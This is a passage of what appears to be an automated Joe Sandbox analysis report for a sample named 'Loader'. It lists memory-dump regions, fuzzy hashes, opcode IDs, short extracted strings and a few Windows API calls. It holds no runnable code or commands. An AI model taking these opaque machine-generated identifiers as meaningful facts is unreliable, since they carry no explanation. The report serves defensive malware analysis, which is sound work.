                                                                            • API ID:
                                                                            • String ID: InA>$P$3
                                                                            • API String ID: 0-4254740818
                                                                            • Opcode ID: 23bbe26acdc5d2f26a26c73dd2c929d2c44a0016ae28f2459096e5ca38903ed9
                                                                            • Instruction ID: 13aa4524906bb3255c4b01c16dc41aa30f5e6763b394d5904251e76a56ae7016
                                                                            • Opcode Fuzzy Hash: 23bbe26acdc5d2f26a26c73dd2c929d2c44a0016ae28f2459096e5ca38903ed9
                                                                            • Instruction Fuzzy Hash: 48E1F47260C3618FD325CF68889076FBBE1EBC5714F158A2CE9A59B395CB7488058BC2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: [N,)$5MS$g?j
                                                                            • API String ID: 0-4035854175
                                                                            • Opcode ID: ca6cf3db0e25f9dd645e5ca151be2a7f3fdca66875abafa992a817d8c7177a31
                                                                            • Instruction ID: e01d210fa11e7487da307f4377d7c9d6710f498da68174fcedefca7a5f9e917b
                                                                            • Opcode Fuzzy Hash: ca6cf3db0e25f9dd645e5ca151be2a7f3fdca66875abafa992a817d8c7177a31
                                                                            • Instruction Fuzzy Hash: 19E1A076E68145CFCB088EFDD598ADEB7F2AB8A700F008117E425E7398D6699807CF15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: -$gfff$gfff
                                                                            • API String ID: 0-837351935
                                                                            • Opcode ID: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                            • Instruction ID: 588dbf8a20046ff0c8db220c2568b6dc06b17837a1a8bae74c05c2b90d30c605
                                                                            • Opcode Fuzzy Hash: fa93bc9afbd1dd26882519429843d715e2f6a0870b720133efd4587a99214889
                                                                            • Instruction Fuzzy Hash: EDE19D7060C7928FC705CE69C49026AFBE1ABDA314F088A6EF9D987356D334D945CB92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Ea#c$Uqrs$cba
                                                                            • API String ID: 0-809142158
                                                                            • Opcode ID: d438f72da7592dac52202ef27c1eaeb2052d2bfd7c88c17bf9933536cd149b90
                                                                            • Instruction ID: b4a5de4532dbe4200815e438950df82b79085ff26f97240ede2f305be119ba74
                                                                            • Opcode Fuzzy Hash: d438f72da7592dac52202ef27c1eaeb2052d2bfd7c88c17bf9933536cd149b90
                                                                            • Instruction Fuzzy Hash: D271CE7251C3658FD320CF65884075FFBE4EBC5714F15892DE8E99B281D7B4860A8BD2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: F]$V[$_]
                                                                            • API String ID: 0-3346205873
                                                                            • Opcode ID: e5a7414d0cadc82038771895add828698e3a1066b2b95cd0b490a0f0be21db8e
                                                                            • Instruction ID: ecb0f12f4c23170b7f0904ba5456e30845f8e4f6138510a8b40cc4983c9e5bb2
                                                                            • Opcode Fuzzy Hash: e5a7414d0cadc82038771895add828698e3a1066b2b95cd0b490a0f0be21db8e
                                                                            • Instruction Fuzzy Hash: 3C71CAB45087808FD3668F2AD594A62BFF1BF47310B1986CDC0E60F6A7C739940ACB85
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: F]$V[$_]
                                                                            • API String ID: 0-3346205873
                                                                            • Opcode ID: 0814b46b741e51f8672edf46a181fd31692ac0fbcc4119d23eae11493b5c9233
                                                                            • Instruction ID: f3d50788bb99e6cf775bd182e34168689ade7bba18a231a48ee806d37fdfb85b
                                                                            • Opcode Fuzzy Hash: 0814b46b741e51f8672edf46a181fd31692ac0fbcc4119d23eae11493b5c9233
                                                                            • Instruction Fuzzy Hash: 2271ACB41087808FD366CF2AD194A62BFE1AF56310B1986DCC0E60F767C735D80ACB95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %!-0$:g;1$j
                                                                            • API String ID: 0-565037024
                                                                            • Opcode ID: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                            • Instruction ID: 14124af76ae048bac53faeeaa4baf39c49faafbcfd7a95fcfe11a1ee10375526
                                                                            • Opcode Fuzzy Hash: 7b9a6866fc4e5d30e60d019d32dbd4ea46c18ece08942ca496210e84bbbb75cb
                                                                            • Instruction Fuzzy Hash: 4D11C17025D381CFD3518F6994206ABBBE0EBD3608F585E5CE0E26B251D371CD06CB46
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: %!-0$:g;1$j
                                                                            • API String ID: 0-565037024
                                                                            • Opcode ID: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                            • Instruction ID: 6eacb080b3071decfbe56e3559daee4ac1ae93aa676c3365255c485d92d871c9
                                                                            • Opcode Fuzzy Hash: fa23b5c8106c8b6eb18a1e5e27922acec8cb3fb0240a5a66eefb843f2f12593b
                                                                            • Instruction Fuzzy Hash: 61F044A001D3408BD7418F29955185BFFE0FB96218F806E1CE0E56B281D3B0C60A8B8B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: T1S7$xr
                                                                            • API String ID: 0-3241550807
                                                                            • Opcode ID: 57cbec6f575536e71c9facbf5599d3ebf445255db18584d56601f51637173bb4
                                                                            • Instruction ID: f095ee3c85f2ef21019022938032d812dfc8efcef6f2f987e5986ef682b2abbe
                                                                            • Opcode Fuzzy Hash: 57cbec6f575536e71c9facbf5599d3ebf445255db18584d56601f51637173bb4
                                                                            • Instruction Fuzzy Hash: 6DA1EEB52097808FE755CF69C4D0262BFE2BF56304B19859CC4D68F75AD336D80ACBA0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$SJK^
                                                                            • API String ID: 0-880411129
                                                                            • Opcode ID: 6b133a1bc997ef1be6f6f5d46954d0d4202491bfac8e762cacfab68672d74f2a
                                                                            • Instruction ID: 75b539838eec60f10042fe609a687484ba24a73e7fbbbab6de16dc621b0ce388
                                                                            • Opcode Fuzzy Hash: 6b133a1bc997ef1be6f6f5d46954d0d4202491bfac8e762cacfab68672d74f2a
                                                                            • Instruction Fuzzy Hash: 488147B6A083115BE750CEA5EC9077BB7D6EBC1704F29C83CDA818B245F775D8068342
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54$;:54
                                                                            • API String ID: 0-2193779323
                                                                            • Opcode ID: 7721a915fb113e19164b39d052d7a6771c4e8979ca88ab04f8906f319b0f0aee
                                                                            • Instruction ID: 5484ec015ca6edb89f38985cbc4c4682f37dee313ff21bc7d31766c2554b2f2d
                                                                            • Opcode Fuzzy Hash: 7721a915fb113e19164b39d052d7a6771c4e8979ca88ab04f8906f319b0f0aee
                                                                            • Instruction Fuzzy Hash: C58125336483419FD754CB988890A7BB3EAFB87704F18893CD6D6673A6D235D901C78A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Noni$f[zU
                                                                            • API String ID: 0-2312422219
                                                                            • Opcode ID: 79a9c11703290c6dc2de5ee27d98105ee7bd1f63dea186e8a0eb6b143202d03c
                                                                            • Instruction ID: ace8df5ac40c892e5e112057ad260b5ac4995c064d6e5356772309ed4753ac98
                                                                            • Opcode Fuzzy Hash: 79a9c11703290c6dc2de5ee27d98105ee7bd1f63dea186e8a0eb6b143202d03c
                                                                            • Instruction Fuzzy Hash: 7F512EB0115701ABE3648F61C998716BBB1FF26708F20968CC1451FBA6D3BAE467CF84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0$8
                                                                            • API String ID: 0-46163386
                                                                            • Opcode ID: dd3a29fe75b0dbad888152c4b368f16b0062119a5cfe37c68317431773dab406
                                                                            • Instruction ID: 9cbff5c6d1d89b027538a105420f8cf075b777a9346613f9d64fcf49d5179152
                                                                            • Opcode Fuzzy Hash: dd3a29fe75b0dbad888152c4b368f16b0062119a5cfe37c68317431773dab406
                                                                            • Instruction Fuzzy Hash: DD31143660D3849FD315CA28C44469FBBE2AFE6204F498D5DF8C4AB342C635D909CB93
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: frMG
                                                                            • API String ID: 0-3306368646
                                                                            • Opcode ID: 3f954fda909f58f8c4b2b329f324e58c1cb6e2f56a7ec37a60a9471de29f41ae
                                                                            • Instruction ID: fb7337dacd811efae20fa7aaa2e40c6828436b2cd361af1f44fdab90cd02c6f2
                                                                            • Opcode Fuzzy Hash: 3f954fda909f58f8c4b2b329f324e58c1cb6e2f56a7ec37a60a9471de29f41ae
                                                                            • Instruction Fuzzy Hash: 2732CE36A44189CFCB04CEFDD5D5BDE7BF2AB86718F204106D425EB359CA3599078B09
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E5030D0,?,?,00000008,?,?,6E502CD3,00000000), ref: 6E503302
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: a5ffd5895a4d0c66f57f851ccb1d5cf216e8bd67b81e2efe78a1201a029d97b3
                                                                            • Instruction ID: 62de21503c08e53985944a222e67d59aee46bbdc2fb9be94c53c9fa486632852
                                                                            • Opcode Fuzzy Hash: a5ffd5895a4d0c66f57f851ccb1d5cf216e8bd67b81e2efe78a1201a029d97b3
                                                                            • Instruction Fuzzy Hash: 1AB1493121060ADFD755CF68C49ABA47BE0FF49364F258658F8A9CF2A1C735E982CB40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: WV%'
                                                                            • API String ID: 0-1381425033
                                                                            • Opcode ID: 9dbff154717ec08c84792ceff1a33ab85fe14eb84e809e39c5bcce79b47cb1e0
                                                                            • Instruction ID: c740d8465fbe66fd95d982585f27571ad36c7f490923890901b2d83715e3dc7d
                                                                            • Opcode Fuzzy Hash: 9dbff154717ec08c84792ceff1a33ab85fe14eb84e809e39c5bcce79b47cb1e0
                                                                            • Instruction Fuzzy Hash: F4E1E1B6A083519FE3018F64DC917ABBBE9EBC1304F08892DF9D09B281E775DD158792
                                                                            APIs
                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E4F866E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID: FeaturePresentProcessor
                                                                            • String ID:
                                                                            • API String ID: 2325560087-0
                                                                            • Opcode ID: 95017c07944d4b252232351d4f2331197ea9d9f2e833471dc2c5563de70b10d0
                                                                            • Instruction ID: 8e68386f124db13bf0f7f4f25fdcd3f80f9a4190198f2e2827cf78b811607580
                                                                            • Opcode Fuzzy Hash: 95017c07944d4b252232351d4f2331197ea9d9f2e833471dc2c5563de70b10d0
                                                                            • Instruction Fuzzy Hash: F05168B2E00A06CFEB45CFA5C891BAABBF0FB89700F15816AD410EB340DB759941CF90
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137733316.000000006E4F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E4F0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137718188.000000006E4F0000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137767384.000000006E504000.00000002.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0606dc12c02b1e56af280ef82ef8054094d12e2792c8c7145ebe9bde7af251f3
                                                                            • Instruction ID: d17ff706e6a3db6e13ed07b31ae77f5650f7775c24d0d7bac780f4596891c853
                                                                            • Opcode Fuzzy Hash: 0606dc12c02b1e56af280ef82ef8054094d12e2792c8c7145ebe9bde7af251f3
                                                                            • Instruction Fuzzy Hash: 1241A3B5804219AEDB10DFB9CC88EEABBB8AF85704F1442DEE419E7200DB309E458F54
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: <?=1
                                                                            • API String ID: 0-2411229740
                                                                            • Opcode ID: 31ad9cb48246c9c236242180de7ea45843c69e16d4ed5688114aee4d6116cf07
                                                                            • Instruction ID: fed8f444b9ca638bfa3ea424a2f163ebb7e93e5b656c8e624a56e0641aa358ba
                                                                            • Opcode Fuzzy Hash: 31ad9cb48246c9c236242180de7ea45843c69e16d4ed5688114aee4d6116cf07
                                                                            • Instruction Fuzzy Hash: 06B13E71B043119BF314CEA9CC907ABB7DA9BC0318F08893DE9959B381EB74DC088791
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0
                                                                            • API String ID: 0-4108050209
                                                                            • Opcode ID: fdfcab0b44d440de227ff6659b5518027139c281f9a9c16e004026d5c1fdd200
                                                                            • Instruction ID: 8ad55fb2307ee4e1f23a828e97288bd36df18adbbcd01778531d79d5511a1499
                                                                            • Opcode Fuzzy Hash: fdfcab0b44d440de227ff6659b5518027139c281f9a9c16e004026d5c1fdd200
                                                                            • Instruction Fuzzy Hash: 52A10733A695A14BC718CEBD8C522A9BBF35B87230B2DC779D970DB3D4D26888024760
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: US
                                                                            • API String ID: 0-1549774597
                                                                            • Opcode ID: 787e27030ed0455a1de99943e9ae2287a07f147f888086e1a2b730836d81c6c4
                                                                            • Instruction ID: 9bfb0bec170ff38640b68b0f638e2a707ce314555895b00de4481fcf689dba1e
                                                                            • Opcode Fuzzy Hash: 787e27030ed0455a1de99943e9ae2287a07f147f888086e1a2b730836d81c6c4
                                                                            • Instruction Fuzzy Hash: 3A7122B19006058FC740DF68C8A26B6B7B1FF46324F298618D8965F7D5F331E946CB90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,
                                                                            • API String ID: 0-3772416878
                                                                            • Opcode ID: bd8c9123f1024831895a57a561de3867567e4f6a249ab722388d82d41eca9c5e
                                                                            • Instruction ID: 27d9982c6aed3410fb0bf1b304cfeaedf98ee7bdd1658f61e0caeb076f9641d6
                                                                            • Opcode Fuzzy Hash: bd8c9123f1024831895a57a561de3867567e4f6a249ab722388d82d41eca9c5e
                                                                            • Instruction Fuzzy Hash: 49B1477110C3819FD321CF58C89065BBBE0AFA9708F448E2DE5D997382D671E919CBA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: InA>
                                                                            • API String ID: 0-2903657838
                                                                            • Opcode ID: e10fb69ccfc62460e9dcbff3ecc425cddf5fa827c23a9ff91a39a2c0a590524f
                                                                            • Instruction ID: 30fd7f079ace4cfde9bd4d935a5b6ace442fdfe39df02dc452ff5d394495daed
                                                                            • Opcode Fuzzy Hash: e10fb69ccfc62460e9dcbff3ecc425cddf5fa827c23a9ff91a39a2c0a590524f
                                                                            • Instruction Fuzzy Hash: 7B71123160C303DFD755DE69CA95B3ABBE2ABC5310F14C92CEAA587285D671D805C782
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;:54
                                                                            • API String ID: 0-2887251705
                                                                            • Opcode ID: e277faeec58326c289543c98b7cc4a386073e6d7b07c32186a8d41a83455c711
                                                                            • Instruction ID: fa77f6f9a3b456613cbd525fc16edf36295cd4f3d308241048616a25049d2bd6
                                                                            • Opcode Fuzzy Hash: e277faeec58326c289543c98b7cc4a386073e6d7b07c32186a8d41a83455c711
                                                                            • Instruction Fuzzy Hash: B9514377F183518BD748CA69CCA173AB7E3ABC5310F09C82CE9959B395E6349C0187C2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #Tw
                                                                            • API String ID: 0-2142424526
                                                                            • Opcode ID: 8e188bc2ee7d6e40ab70177a9e4eb1f1384410543d28ad899d71db6d5c9334c1
                                                                            • Instruction ID: ad576f47e3d1292ca6b7fb7b9be2a5ad6bbd690b12eacd1f6d8d3641f0e7c5b6
                                                                            • Opcode Fuzzy Hash: 8e188bc2ee7d6e40ab70177a9e4eb1f1384410543d28ad899d71db6d5c9334c1
                                                                            • Instruction Fuzzy Hash: 9E513876A046404BE7094F78AC916BF77E79BC231CF2C492CD1861B3D5EF6AA8078346
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2137788755.000000006E50B000.00000004.00000001.01000000.00000007.sdmp, Offset: 6E50B000, based on PE: true
                                                                            • Associated: 00000000.00000002.2137884008.000000006E55E000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_6e4f0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: +
                                                                            • API String ID: 0-2126386893
                                                                            • Opcode ID: 0a9bcae550bcb0f03721a248c8d81f5e8a86f020cbc6a570549ac9d0f6b5465f
                                                                            • Instruction ID: 0f04c6afe2e22bc64fc65d0743371038255df27e84a288fbd1d19fa6862bab5d
                                                                            • Opcode Fuzzy Hash: 0a9bcae550bcb0f03721a248c8d81f5e8a86f020cbc6a570549ac9d0f6b5465f
                                                                            • Instruction Fuzzy Hash: 0651273124CB408FE359CB78C8943977BE2BB86314F098A5DD1EA87BC2CB35A545CB41
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6;(
                                                                            • API String ID: 0-2446351560
                                                                            • Opcode ID: b1b2476594bc46322f764d7938ac23998a59b8a664fd547b4819134417ea8b1d
                                                                            • Instruction ID: 5bcd0ec0a4f58744cf8a2eef5b3df83e181c1421bc366c53de57c3366447f34a
                                                                            • Opcode Fuzzy Hash: b1b2476594bc46322f764d7938ac23998a59b8a664fd547b4819134417ea8b1d
                                                                            • Instruction Fuzzy Hash: 3141F731714205CFCB14CB6ECD81A67B7F6FF86310B24C86AE09ACB650D234E951CB91
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 6;(
                                                                            • API String ID: 0-2446351560
                                                                            • Opcode ID: 6d2bb7789ffd3d580ffd29d91d9ebfe364ed54d62938981ef5f51e56a7f576e8
                                                                            • Instruction ID: b65d03e549d6b85577d0654194100940e71ccf2b8c6cf1e915226672b5e00f72
                                                                            • Opcode Fuzzy Hash: 6d2bb7789ffd3d580ffd29d91d9ebfe364ed54d62938981ef5f51e56a7f576e8
                                                                            • Instruction Fuzzy Hash: ED41D731614605CFCB14CB6ECD81A7BB7F6FF96310B24C86AE09ACB651D234E945CB51
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2133598941.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_da0000_Loader.jbxd
                                                                            Similarity
                                                                            • API ID:
